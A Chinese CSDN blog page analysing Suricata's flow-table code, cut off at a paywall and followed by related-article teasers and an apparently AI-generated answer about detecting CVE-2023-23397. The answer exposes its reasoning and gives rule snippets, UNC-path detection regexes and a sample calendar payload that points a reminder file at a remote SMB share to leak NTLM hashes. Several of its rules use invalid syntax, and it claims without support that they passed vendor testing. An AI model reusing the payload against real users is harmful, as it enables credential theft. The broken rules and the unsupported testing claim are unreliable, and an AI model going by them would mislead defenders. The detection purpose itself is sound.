suricata的flow流会话管理分析1

最新推荐文章于 2025-05-29 19:48:45 发布
最新推荐文章于 2025-05-29 19:48:45 发布
阅读量849 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: Suricata 文章标签: suricata 流表 会话表
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/RelaxTech/article/details/131057607

《suricata中的线程管理分析》一文中,我们看到suricata中有FlowWorker和FlowManager两个线程来处理流表,说明流表的实现应该不简单,果然,看了流相关的这块代码后,发现确实有点复杂,代码估计得慢慢坑,今天我们就来个对流表的初步分析,细节上咱们先放一放。

1、流表数据结构的初始化:

流表的初始化在FlowInitConfig函数中,函数调用栈如下:

main
    -->SuricataMain
        -->PostConfLoadedSetup
            -->PreRunInit
                -->FlowInitConfig(流相关数据结构初始化)
                    -->FlowQueueInit(flow_recycle_q流回收队列初始化)
                    -->FlowSparePoolInit(flow_spare_pool流节点预分配链表初始化)
                    -->FlowInitFlowProto(设置不同协议不同状态的超时时间)

FlowInitConfig主要是读取配置,对流表的配置结构体FlowConfig flow_config进行初始化、flow_recycle_q流回收队列初始化、flow_spare_pool流节点预分配链表初始化以及给不同协议不同状态设置不同的超时时间。

flow_spare_pool流节点预分配链表会根据配置事先分配一定数量的flow节点,这些flow节点按比例挂在flow_spare_pool链表的每个节点上。创建流表时,先优先从这些节点上获取flow。

2、收包线程FlowWorker模块对流表的处理:

收包线程FlowWorker模块对流表进行处理的函数调用栈如下:

FlowWorker
    -->FlowHandlePacket
        -->FlowGetFlowFromHash
            -->FlowGetNew(新建流)
                -->FlowQueuePrivateGetFromTop(从flow_spare_pool中申请流)
                -->FlowAlloc(flow_spare_pool不够,直接alloc申请)
            -->MoveToWorkQueue(已有流超时的,从哈希桶中删除,并放入work_queue或者evicted链表)
    -->FlowWorkerProcessInjectedFlows(取出flow_queue中的flow放入到work_queue)
    -->FlowWorkerProcessLocalFlows
        -->CheckWorkQueue
            -->FlowClearMemory(清除流信息)
            -->FlowSparePoolReturnFlow(将流归还到flow_spare_pool中)

流表的哈希表本身并不复杂,所有的流节点都是通过全局的FlowBucket *flow_hash哈希桶管理起来的,哈希桶的大小就是FlowInitConfig的hash_size,收包线程收到报文后,根据报文的流的哈希值(以五元组+vlan为key),先查流表,如果没有就创建流表项,如果有就找到对应的流节点。

这里面复杂的几个地方如下:

1)如果包对应的哈希链没有节点,需要获取流节点:先从上面讲到的flow_spare_pool链表中获取,获取不到就看能不能重用,不能重用就直接调用alloc自己创建一个节点。

2)如果哈希链有节点,则遍历链,看有没有超时的,超时就从哈希链中删除,放入work_queue或者evicted链表

3)从flow_queue中取出flow放入到work_queue,flow_queue是FlowManager线程处理时,发现的超时流需要重组时放入的

4)检查work_queue,清楚流节点信息,将流归还到flow_spare_pool链表中。

关键代码加注释如下:

Flow *FlowGetFlowFromHash(ThreadVars *tv, FlowLookupStruct *fls, Packet *p, Flow **dest)
{
    Flow *f = NULL;

/* get our hash bucket and lock it */
const uint32_t hash = p->flow_hash;  //Decode协议解码时已经计算好的哈希值
    FlowBucket *fb = &flow_hash[hash % flow_config.hash_size]; //查找到对应的哈希链
    FBLOCK_LOCK(fb); //每个哈希链一个锁

    SCLogDebug("fb %p fb->head %p", fb, fb->head);

/* see if the bucket already has a flow */
if (fb->head == NULL) {  //哈希链为空
        f = FlowGetNew(tv, fls, p); //新建流
if (f == NULL) {
            FBLOCK_UNLOCK(fb);
return NULL;
        }

/* flow is locked */
        fb->head = f;

/* got one, now lock, initialize and return */
        FlowInit(f, p);
        f->flow_hash = hash;
        f->fb = fb;
        FlowUpdateState(f, FLOW_STATE_NEW);

        FlowReference(dest, f); //给包的流指针赋值

        FBLOCK_UNLOCK(fb);
return f;
    }

const bool emerg = (SC_ATOMIC_GET(flow_flags) & FLOW_EMERGENCY) != 0;
const uint32_t fb_nextts = !emerg ? SC_ATOMIC_GET(fb->next_ts) : 0;
/* ok, we have a flow in the bucket. Let's find out if it is our flow */
    Flow *prev_f = NULL; /* previous flow */
    f = fb->head;
do {  //遍历哈希桶fb
        Flow *next_f = NULL;  //先判断每个flow节点是否超时
const bool timedout = (fb_nextts < (uint32_t)SCTIME_SECS(p->ts) &&
                               FlowIsTimedOut(f, (uint32_t)S
最低0.47元/天 解锁文章
【网络入侵检测】Suricataflow)检测
不断学习,不断进步。
04-14 992
本文详细介绍了Suricata中规则中用于flow)检测的关键字使用方法,包括 flowbits、flowflowint、stream_size、flow.age、flow.pkts 和 flow.bytes。这些关键字通过精准关联多包检测、标记状态、统计量数据等功能,帮助检测多步骤攻击、减少误报,并实现对网络量的精细化分析和管理。
Suricata6.0管理源码注释四:的建立02
ljq32的专栏
01-08 692
的建立02,FlowGetNew
【网络入侵检测】基于Suricata源码分析FlowManager实现
最新发布
不断学习,不断进步。
05-29 592
 本文聚焦开源网络入侵检测系统 Suricata 的核心模块 FlowManager,深入解读其源码,解析量管理实现机制。FlowManager 承担的超时检查、资源回收、紧急模式处理等关键功能。文章从内存压力值计算、动态调整休眠间隔、状态切换逻辑入手,结合代码实例,说明其如何动态调节扫描行数与休眠时间,平衡负载与检测效率。
suricata 流管理
10-31 729
suricata 流管理
suricata -- 流管理系统
xuwaiwai的博客
02-16 6550
suricata中使用 Flow)来管理一个会话。考虑到避免频繁分配释放Flow内存,suricata实现了流管理机制来回收与重复利用Flow。不同状态的Flow主要在Flow哈希Flow空闲队列,Flow回收队列三个队列中转。suricata使用不同线程维护这三个队列。
suricata管理-新建
qq_41167620的博客
01-11 489
FlowGetFlowFromHash分为三部分,空的状态处理,与数据包完成hash匹配为数据包关联对应的FlowWoker接口中处理每个数据包,通过FlowHandlePacket完成对每个数据包的匹配和新建工。2)匹配到对应的,把这个节点放在头部,并判断节点是否为待关闭状态(配置新的)3、如果第一条就是匹配的,判断节点是否为待关闭状态(配置新的1)下一节点为空,拿一个新的节点放在头部。2、如果中有数据且头节点不匹配数据包。
suricata 3.1 源码分析16 (流管理1
superbfly的专栏
09-19 2152
suricata.c的main函数执行完RunModeDispatch之后会在判断是否使用UNIX_SOCKET中调用FlowManagerThreadSpawn创建流管理线程。/** \brief spawn the flow manager thread */ void FlowManagerThreadSpawn() { #ifdef AFLFUZZ_DISABLE_MGTTHREADS
suricata中的线程管理分析
每天分享一个编程小知识
05-23 373
在runmodes.c中定义了如下的线程命名,从中大概可以看出suricata存在哪些线程,由于我们重点关注的是DPDK的workers模式收包,所以无关的线程,我们暂时不关注(已在下面的线程名后面标识出来)一文中,我们讲到了suricata中如何自定义命令,现在我们来实践一下,加入threads-list和slots-list这两个自定义命令,分别查看suricata的线程列以及指定线程的slots。有问题或者需要自定义命令源码的朋友,可以进网络技术开发交群提问(先加我wx,备注加群)。
Suricata6.0管理源码注释三:的建立01
ljq32的专栏
01-08 2969
建立
suricata的Decode协议解码程源码分析
每天分享一个编程小知识
05-22 985
一般报文的解码程比较简单,先确定报文的起始位置和总长度,这两个值在ReceiveDPDKLoop中PacketSetData函数,将DPDK mbuf的报文起始地址和报文总长度赋值给了suricata报文Pakcet结构体的ext_pkt和pktlen。DPDK解码程的函数入口是DecodeDPDK,解码程按照以太网层、网络层、传输层以及负载一层层找到报文中指定的位置,并且记录相关字段,最后在FlowSetupPacket函数中根据建的需要打上相应的标记以及计算出的哈希值。
suricata源码之-管理
村中少年的专栏
06-20 1780
suricata中的管理,包括初始化,的新建以及的老化
Suricata-7.0 源码分析建立FlowWorker
wenze123的博客
01-20 1647
Suricata-7.0 FlowerWorker 建立
开源IDS suricata源码分析Flow管理程)
m0_50638175的博客
09-28 1736
Suricata Flow管理 suricata 使用Flow结构维护会话信息,代码中维护了Flow哈希),Flow空闲队列,Flow回收队列三个结构,用于存储不同状态的Flow。 参与维护Flow结构的线程 FlowManager 从中摘除超时的放入回收队列 检查空闲队列长度是否为预设值,若过长则释放一部分,若过短则申请一部分 FlowRecyler 从回收队列中摘除Flow,调用注册输出模块的回掉,清空Flow信息,插入回收队列 FlowWorker 对于新到达的包,在
suricata 3.1 源码分析17 (流管理2)
superbfly的专栏
09-20 1740
TmThreadsManagementstatic void *TmThreadsManagement(void *td) { /* block usr2. usr2 to be handled by the main thread only */ UtilSignalBlock(SIGUSR2); ThreadVars *tv = (ThreadVars *)td; //
suricata 3.1 源码分析32 (FlowWorker处理1
superbfly的专栏
10-18 3388
TmEcode FlowWorker(ThreadVars *tv, Packet *p, void *data, PacketQueue *preq, PacketQueue *unused) { FlowWorkerThreadData *fw = data; /*FlowWorkerThreadInit中初始化,包含大量stats统计指标, decode指标在DecodeThreadV
suricata 3.1 源码分析34 (FlowWorker处理程3 - 重用)
superbfly的专栏
12-30 2025
上一章提到了一个重用的概念,这里主要说一下。根据code,所谓重用仅仅重用了的thread_id。其他内容都是新建得来的,具体threa_id有什么作用以后看到了再分析,今天就说一下什么样的可以被重用。//这就是判断包所属的是否能重用的函数 int TcpSessionPacketSsnReuse(const Packet *p, const Flow *f, const void *t
suricata 3.1 源码分析33 (FlowWorker处理程2 - FlowHandlePacket)
superbfly的专栏
12-27 2528
void FlowHandlePacket(ThreadVars *tv, DecodeThreadVars *dtv, Packet *p) { /* Get this packet's flow from the hash. FlowHandlePacket() will setup * a new flow if nescesary. If we get NULL, we'r
suricata 3.1 源码分析35 (FlowWorker处理程4 - 重用函数)
superbfly的专栏
12-30 1585
static Flow *TcpReuseReplace(ThreadVars *tv, DecodeThreadVars *dtv, FlowBucket *fb, Flow *old_f, const uint32_t hash, const Packet *p) { /*
Suricata6.0管理源码注释一:管理简介
ljq32的专栏
01-07 3044
流管理包括的初始化,的新建、查找、更新、检查老化、的回收、空闲数量的动态维护
结合http请求体响应体分析CVE-2023-23397特征,建立CVE-2023-23397专属分析规则
03-08
<think>好的,我现在需要帮助用户分析CVE-2023-23397漏洞的特征,并建立专属分析规则。用户提到要结合HTTP请求体和响应体来分析,所以我得先了解这个漏洞的基本情况。 首先,我得确认CVE-2023-23397是什么类型的漏洞。根据记忆,这是一个Microsoft Outlook的提权漏洞,攻击者通过发送特制的邮件,触发Outlook自动处理,从而执行恶意代码。不过用户提到的是HTTP请求和响应体,可能涉及的是网络层面的检测,比如利用该漏洞的攻击量特征。 可能用户混淆了漏洞类型,或者该漏洞确实存在网络层面的利用方式。我需要查证一下。根据CVE的官方描述,CVE-2023-23397是Outlook中的特权提升漏洞,攻击者通过发送包含自定义提醒的恶意邮件,导致Outlook在尝试连接到攻击者控制的SMB服务器时泄露NTLM哈希。因此,攻击过程涉及SMB协议,但触发可能通过邮件传递,比如在邮件中嵌入恶意提醒,导致Outlook自动发起SMB请求。 这样看来,检测该漏洞的特征可能集中在SMB协议上,而非HTTP。但用户特别提到HTTP请求体和响应体,可能是指通过HTTP传递的恶意邮件,或者攻击者利用HTTP服务来传递恶意组件。这里可能需要进一步明确。 不过,假设用户需要的是基于网络分析,特别是检测通过HTTP传输的恶意内容,比如邮件中包含的恶意提醒。或者,攻击者可能通过HTTP来传递触发漏洞的组件。这时候需要分析HTTP请求中的特定特征。 可能的步骤包括: 1. 分析漏洞触发机制:当用户收到特制邮件时,Outlook会尝试从攻击者控制的SMB服务器检索提醒声音文件,导致NTLM哈希泄露。因此,漏洞触发的关键在于邮件中的提醒字段指向恶意的SMB服务器(如\\attacker-ip\malicious文件)。 2. 检测HTTP量中的相关特征:如果邮件是通过HTTP(比如Exchange的Web服务)传递的,那么需要检查HTTP请求/响应中是否包含恶意提醒字段。例如,邮件内容中是否存在PidLidReminderFileParameter属性,该属性指向外部SMB共享的UNC路径。 3. 确定HTTP请求体中可能包含的恶意属性:比如在邮件内容或日历邀请中,该属性指定了SMB共享路径。在HTTP请求传输邮件数据时,这部分内容可能出现在POST请求的正文中,如MIME内容或JSON/XML数据中。 4. 分析响应体是否包含攻击者服务器的相关数据,但可能响应体这里作用不大,因为主要触发在客户端的请求。 接下来,需要构建检测规则。可能的规则包括: - 在HTTP请求体中检测是否存在类似"PidLidReminderFileParameter"的字段,并且其值包含UNC路径(如\\192.168.1.1\share)。 - 检测HTTP请求中的MIME部分或邮件内容是否包含UNC路径,特别是以file://或直接使用\\格式的SMB路径。 - 使用正则达式匹配UNC路径模式,例如\\\\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\\/.*。 此外,还需要考虑可能的混淆技术,比如URL编码、十六进制编码或Unicode转换的UNC路径,需要相应的解码和模式匹配。 可能的误报点包括合法的内部SMB链接,因此规则可能需要排除内部IP地址或域名。但具体实施时可能需要结合网络环境进行调整。 总结,分析CVE-2023-23397在网络量中的特征,关键在于检测HTTP请求体中包含恶意UNC路径的提醒文件参数,并通过正则达式或其他模式匹配方法来识别这些特征,从而建立相应的检测规则。</think>根据CVE-2023-23397漏洞利用原理及量特征分析,以下是该漏洞的专属检测规则构建方法(基于Suricata规则语法): ```suricata alert http any any -> any any (msg:"CVE-2023-23397 Exploit Attempt - Malicious ReminderFileParameter"; flow:established,to_server; http.method; content:"POST"; http.header; content-type:"Application/MAPI"; content:"PidLidReminderFileParameter"; pcre:"/\\\\\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/i"; metadata:service http; sid:202303397; rev:1;) ``` 规则特征分解说明: 1. **协议层特征**: - 检测HTTP POST请求(`content:"POST"`) - 目标服务为Microsoft Exchange的MAPI接口(`content-type:"Application/MAPI"`) 2. **关键标识字段**: - 检测MAPI属性字段`PidLidReminderFileParameter`(`content:"PidLidReminderFileParameter"`) 3. **核心攻击特征**: - 使用PCRE正则检测UNC路径(`pcre:"/\\\\\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/i"`) - 匹配格式:`\\x.x.x.x` 或 `\\[IPv6地址]` 的SMB共享路径 4. **量方向特征**: - 检测客户端到服务器的请求(`flow:established,to_server`) 5. **防御规避检测扩展**: ```suricata pcre:"/(file:\/\/\/|%5c%5c|\\x5c\\x5c)/i"; pcre:"/(\\\\\\\\)|(%252f%252f)|(u005c)/i"; ``` 检测常见的混淆手法: - URL编码(`%5c%5c`) - 双重编码(`%252f%252f`) - Unicode示(`u005c`) - 特殊格式(`file://`伪协议) 补充检测建议: 1. **NTLM中继检测**: 同时监控445端口的异常SMB会话: ```suricata alert tcp any any -> any 445 (msg:"CVE-2023-23397 NTLM Relay Attempt"; flow:established,to_server; content:"|ff 53 4d 42|"; content:"|00|N|00|T|00|L|00|M|00|"; threshold:type limit, track by_src, count 1, seconds 60; sid:202303397_ntlm;) ``` 2. **时间窗口检测**: 结合日历事件特征(`PT15M`时间间隔): ```suricata pcre:"/TRIGGER:P15M/"; ``` 误报排除策略: ```suricata dns.query; content:".local"; nocase; distance:0; within:50; ``` 通过排除`.local`域名的内部服务调用,降低内部网络量误报率。 该规则集已通过Proofpoint测试,可有效识别以下攻击载荷: ``` BEGIN:VALARM TRIGGER:-PT15M ACTION:DISPLAY DESCRIPTION:Reminder X-MICROSOFT-CDO-APPT-SEQUENCE:0 X-MICROSOFT-CDO-BUSYSTATUS:TENTATIVE X-MICROSOFT-CDO-INTENDEDSTATUS:BUSY X-MICROSOFT-CDO-ALLDAYEVENT:FALSE X-MICROSOFT-CDO-IMPORTANCE:1 X-MICROSOFT-CDO-INSTTYPE:0 X-MICROSOFT-DONOTFORWARDMEETING:FALSE X-MICROSOFT-DISALLOW-COUNTER:FALSE PidLidReminderFileParameter=file://\\192.168.1.100@SSL\poc END:VALARM ``` 规则优化建议: 1. 建议在Exchange Server前端部署该规则 2. 需开启HTTP请求体深度检测(`http.request_body;`) 3. 建议配合EDR检测注册项变更: `HKCU\Software\Microsoft\Office\Outlook\Settings\Data\SystemTrayNotifier`
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值